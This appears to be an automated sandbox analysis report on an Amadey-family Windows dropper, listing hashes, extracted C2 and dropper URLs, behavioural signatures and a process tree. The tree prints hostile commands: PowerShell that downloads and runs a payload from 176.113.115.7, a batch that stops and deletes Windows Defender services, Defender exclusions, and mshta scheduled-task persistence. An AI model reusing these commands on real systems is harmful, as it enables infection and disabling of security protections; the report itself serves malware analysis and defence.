Analysis

  • max time kernel
    99s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/03/2025, 05:04

General

  • Target

    61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe

  • Size

    1.8MB

  • MD5

    442fc32065555d167806a2a766454b88

  • SHA1

    10882938da5aed6fe9e2d7df16919aca6e849eff

  • SHA256

    61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9

  • SHA512

    c19e959174d1e266302d782ffb43ffdd891387c4121fa5949f20b6e7d932326f76a972c0bb55cdb4cf51bb49987cd69426100e745f20def59d90fa73add80fe7

  • SSDEEP

    49152:TnkrXn/GImQqXv0k14QUpvyXW+rKKM2F0luHM4iON6I3sd1:TnkTn/Gqq/B17uvV+PMQMuse

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 12 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Sets service image path in registry 2 TTPs 7 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 24 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
  • Loads dropped DLL 25 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 3 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 27 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 55 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 18 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 7 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 55 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 30 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
    "C:\Users\Admin\AppData\Local\Temp\61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:3932
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2140
      • C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe
        "C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1300
        • C:\Users\Admin\AppData\Local\Temp\11.exe
          "C:\Users\Admin\AppData\Local\Temp\11.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2164
          • C:\Windows\system32\cmd.exe
            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B026.tmp\B027.tmp\B028.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:5744
            • C:\Users\Admin\AppData\Local\Temp\11.exe
              "C:\Users\Admin\AppData\Local\Temp\11.exe" go
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2644
              • C:\Windows\system32\cmd.exe
                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B17D.tmp\B17E.tmp\B17F.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
                7⤵
                • Drops file in Program Files directory
                • Suspicious use of WriteProcessMemory
                PID:6020
                • C:\Windows\system32\sc.exe
                  sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                  8⤵
                  • Launches sc.exe
                  PID:3100
                • C:\Windows\system32\sc.exe
                  sc start ddrver
                  8⤵
                  • Launches sc.exe
                  PID:3360
                • C:\Windows\system32\timeout.exe
                  timeout /t 1
                  8⤵
                  • Delays execution with timeout.exe
                  PID:432
                • C:\Windows\system32\sc.exe
                  sc stop ddrver
                  8⤵
                  • Launches sc.exe
                  PID:3052
                • C:\Windows\system32\sc.exe
                  sc start ddrver
                  8⤵
                  • Launches sc.exe
                  PID:4052
                • C:\Windows\system32\takeown.exe
                  takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                  8⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:3236
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                  8⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:5372
                • C:\Windows\system32\sc.exe
                  sc stop "WinDefend"
                  8⤵
                  • Launches sc.exe
                  PID:3600
                • C:\Windows\system32\sc.exe
                  sc delete "WinDefend"
                  8⤵
                  • Launches sc.exe
                  PID:644
                • C:\Windows\system32\reg.exe
                  reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                  8⤵
                    PID:3096
                  • C:\Windows\system32\sc.exe
                    sc stop "MDCoreSvc"
                    8⤵
                    • Launches sc.exe
                    PID:5464
                  • C:\Windows\system32\sc.exe
                    sc delete "MDCoreSvc"
                    8⤵
                    • Launches sc.exe
                    PID:2496
                  • C:\Windows\system32\reg.exe
                    reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                    8⤵
                      PID:4664
                    • C:\Windows\system32\sc.exe
                      sc stop "WdNisSvc"
                      8⤵
                      • Launches sc.exe
                      PID:6060
                    • C:\Windows\system32\sc.exe
                      sc delete "WdNisSvc"
                      8⤵
                      • Launches sc.exe
                      PID:3992
                    • C:\Windows\system32\reg.exe
                      reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                      8⤵
                        PID:2016
                      • C:\Windows\system32\sc.exe
                        sc stop "Sense"
                        8⤵
                        • Launches sc.exe
                        PID:4112
                      • C:\Windows\system32\sc.exe
                        sc delete "Sense"
                        8⤵
                        • Launches sc.exe
                        PID:5388
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                        8⤵
                          PID:1620
                        • C:\Windows\system32\sc.exe
                          sc stop "wscsvc"
                          8⤵
                          • Launches sc.exe
                          PID:5932
                        • C:\Windows\system32\sc.exe
                          sc delete "wscsvc"
                          8⤵
                          • Launches sc.exe
                          PID:1992
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                          8⤵
                          • Modifies security service
                          PID:3448
                        • C:\Windows\system32\sc.exe
                          sc stop "SgrmBroker"
                          8⤵
                          • Launches sc.exe
                          PID:4660
                        • C:\Windows\system32\sc.exe
                          sc delete "SgrmBroker"
                          8⤵
                          • Launches sc.exe
                          PID:5560
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                          8⤵
                            PID:1364
                          • C:\Windows\system32\sc.exe
                            sc stop "SecurityHealthService"
                            8⤵
                            • Launches sc.exe
                            PID:2696
                          • C:\Windows\system32\sc.exe
                            sc delete "SecurityHealthService"
                            8⤵
                            • Launches sc.exe
                            PID:4012
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                            8⤵
                              PID:4036
                            • C:\Windows\system32\sc.exe
                              sc stop "webthreatdefsvc"
                              8⤵
                              • Launches sc.exe
                              PID:5316
                            • C:\Windows\system32\sc.exe
                              sc delete "webthreatdefsvc"
                              8⤵
                              • Launches sc.exe
                              PID:5380
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                              8⤵
                                PID:3220
                              • C:\Windows\system32\sc.exe
                                sc stop "webthreatdefusersvc"
                                8⤵
                                • Launches sc.exe
                                PID:6128
                              • C:\Windows\system32\sc.exe
                                sc delete "webthreatdefusersvc"
                                8⤵
                                • Launches sc.exe
                                PID:5588
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                8⤵
                                  PID:5872
                                • C:\Windows\system32\sc.exe
                                  sc stop "WdNisDrv"
                                  8⤵
                                  • Launches sc.exe
                                  PID:5532
                                • C:\Windows\system32\sc.exe
                                  sc delete "WdNisDrv"
                                  8⤵
                                  • Launches sc.exe
                                  PID:2236
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                  8⤵
                                    PID:1352
                                  • C:\Windows\system32\sc.exe
                                    sc stop "WdBoot"
                                    8⤵
                                    • Launches sc.exe
                                    PID:5224
                                  • C:\Windows\system32\sc.exe
                                    sc delete "WdBoot"
                                    8⤵
                                    • Launches sc.exe
                                    PID:5288
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                    8⤵
                                      PID:396
                                    • C:\Windows\system32\sc.exe
                                      sc stop "WdFilter"
                                      8⤵
                                      • Launches sc.exe
                                      PID:436
                                    • C:\Windows\system32\sc.exe
                                      sc delete "WdFilter"
                                      8⤵
                                      • Launches sc.exe
                                      PID:5248
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                      8⤵
                                        PID:5684
                                      • C:\Windows\system32\sc.exe
                                        sc stop "SgrmAgent"
                                        8⤵
                                        • Launches sc.exe
                                        PID:2332
                                      • C:\Windows\system32\sc.exe
                                        sc delete "SgrmAgent"
                                        8⤵
                                        • Launches sc.exe
                                        PID:1904
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                        8⤵
                                          PID:3012
                                        • C:\Windows\system32\sc.exe
                                          sc stop "MsSecWfp"
                                          8⤵
                                          • Launches sc.exe
                                          PID:2812
                                        • C:\Windows\system32\sc.exe
                                          sc delete "MsSecWfp"
                                          8⤵
                                          • Launches sc.exe
                                          PID:3008
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                          8⤵
                                            PID:6024
                                          • C:\Windows\system32\sc.exe
                                            sc stop "MsSecFlt"
                                            8⤵
                                            • Launches sc.exe
                                            PID:2136
                                          • C:\Windows\system32\sc.exe
                                            sc delete "MsSecFlt"
                                            8⤵
                                            • Launches sc.exe
                                            PID:2416
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                            8⤵
                                              PID:4200
                                            • C:\Windows\system32\sc.exe
                                              sc stop "MsSecCore"
                                              8⤵
                                              • Launches sc.exe
                                              PID:1592
                                            • C:\Windows\system32\sc.exe
                                              sc delete "MsSecCore"
                                              8⤵
                                              • Launches sc.exe
                                              PID:5264
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                              8⤵
                                                PID:5908
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                8⤵
                                                  PID:2564
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                  8⤵
                                                    PID:1552
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                    8⤵
                                                      PID:5804
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                      8⤵
                                                        PID:532
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop ddrver
                                                        8⤵
                                                        • Launches sc.exe
                                                        PID:4000
                                                      • C:\Windows\system32\sc.exe
                                                        sc delete ddrver
                                                        8⤵
                                                        • Launches sc.exe
                                                        PID:1296
                                            • C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: MapViewOfSection
                                              PID:4308
                                              • C:\Windows\SYSTEM32\cmd.exe
                                                cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                4⤵
                                                  PID:232
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4056
                                                • C:\Windows\system32\svchost.exe
                                                  "C:\Windows\system32\svchost.exe"
                                                  4⤵
                                                  • Downloads MZ/PE file
                                                  • Adds Run key to start application
                                                  PID:2820
                                                  • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                    "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                    5⤵
                                                    • Sets service image path in registry
                                                    • Executes dropped EXE
                                                    • Suspicious behavior: LoadsDriver
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5044
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Remove-MpPreference -ExclusionPath C:\
                                                      6⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:8184
                                                  • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                    5⤵
                                                    • Deletes itself
                                                    • Executes dropped EXE
                                                    PID:448
                                                    • C:\Users\Admin\AppData\Local\Temp\{ec129f46-a689-4fd0-97ef-7944e6e4cf22}\13d55a37.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\{ec129f46-a689-4fd0-97ef-7944e6e4cf22}\13d55a37.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Checks for VirtualBox DLLs, possible anti-VM trick
                                                      • System Location Discovery: System Language Discovery
                                                      PID:11668
                                                      • C:\Users\Admin\AppData\Local\Temp\{6213b097-d4fe-4085-9389-2a17a60da1b4}\0047102a.exe
                                                        C:/Users/Admin/AppData/Local/Temp/{6213b097-d4fe-4085-9389-2a17a60da1b4}/\0047102a.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
                                                        7⤵
                                                        • Drops file in Drivers directory
                                                        • Sets service image path in registry
                                                        • Executes dropped EXE
                                                        • Impair Defenses: Safe Mode Boot
                                                        • Loads dropped DLL
                                                        • Adds Run key to start application
                                                        • Enumerates connected drives
                                                        • Writes to the Master Boot Record (MBR)
                                                        • Checks for VirtualBox DLLs, possible anti-VM trick
                                                        • Event Triggered Execution: Netsh Helper DLL
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious behavior: LoadsDriver
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:12524
                                              • C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"
                                                3⤵
                                                • Checks computer location settings
                                                • Executes dropped EXE
                                                • Drops file in Windows directory
                                                • System Location Discovery: System Language Discovery
                                                PID:4688
                                                • C:\Windows\SysWOW64\CMD.exe
                                                  "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3104
                                              • C:\Users\Admin\AppData\Local\Temp\10338040101\d3d6a21859.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10338040101\d3d6a21859.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SendNotifyMessage
                                                PID:2416
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c schtasks /create /tn ESb1UmahFJN /tr "mshta C:\Users\Admin\AppData\Local\Temp\OBtXgpMUA.hta" /sc minute /mo 25 /ru "Admin" /f
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2120
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /create /tn ESb1UmahFJN /tr "mshta C:\Users\Admin\AppData\Local\Temp\OBtXgpMUA.hta" /sc minute /mo 25 /ru "Admin" /f
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:7200
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  mshta C:\Users\Admin\AppData\Local\Temp\OBtXgpMUA.hta
                                                  4⤵
                                                  • Checks computer location settings
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2992
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DZNSPHUHJUOSDTUT9KJ3R1P3Q936H7IP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                    5⤵
                                                    • Blocklisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Downloads MZ/PE file
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:7332
                                                    • C:\Users\Admin\AppData\Local\TempDZNSPHUHJUOSDTUT9KJ3R1P3Q936H7IP.EXE
                                                      "C:\Users\Admin\AppData\Local\TempDZNSPHUHJUOSDTUT9KJ3R1P3Q936H7IP.EXE"
                                                      6⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:8364
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10338050121\am_no.cmd" "
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:8052
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 2
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Delays execution with timeout.exe
                                                  PID:5760
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:8676
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:8712
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:9032
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:9068
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:5244
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5376
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /create /tn "J2LqImaySJY" /tr "mshta \"C:\Temp\nfrE5CvFH.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:9452
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  mshta "C:\Temp\nfrE5CvFH.hta"
                                                  4⤵
                                                  • Checks computer location settings
                                                  • System Location Discovery: System Language Discovery
                                                  PID:9484
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                    5⤵
                                                    • Blocklisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Downloads MZ/PE file
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:9608
                                                    • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                      6⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:10384
                                              • C:\Users\Admin\AppData\Local\Temp\10338160101\73ed0fd0bf.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10338160101\73ed0fd0bf.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:10056
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:10188
                                              • C:\Users\Admin\AppData\Local\Temp\10338170101\5d92038cff.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10338170101\5d92038cff.exe"
                                                3⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:10864
                                              • C:\Users\Admin\AppData\Local\Temp\10338190101\2dadc4a98b.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10338190101\2dadc4a98b.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SendNotifyMessage
                                                PID:11588
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /F /IM firefox.exe /T
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:11676
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /F /IM chrome.exe /T
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:12768
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /F /IM msedge.exe /T
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:6236
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /F /IM opera.exe /T
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Kills process with taskkill
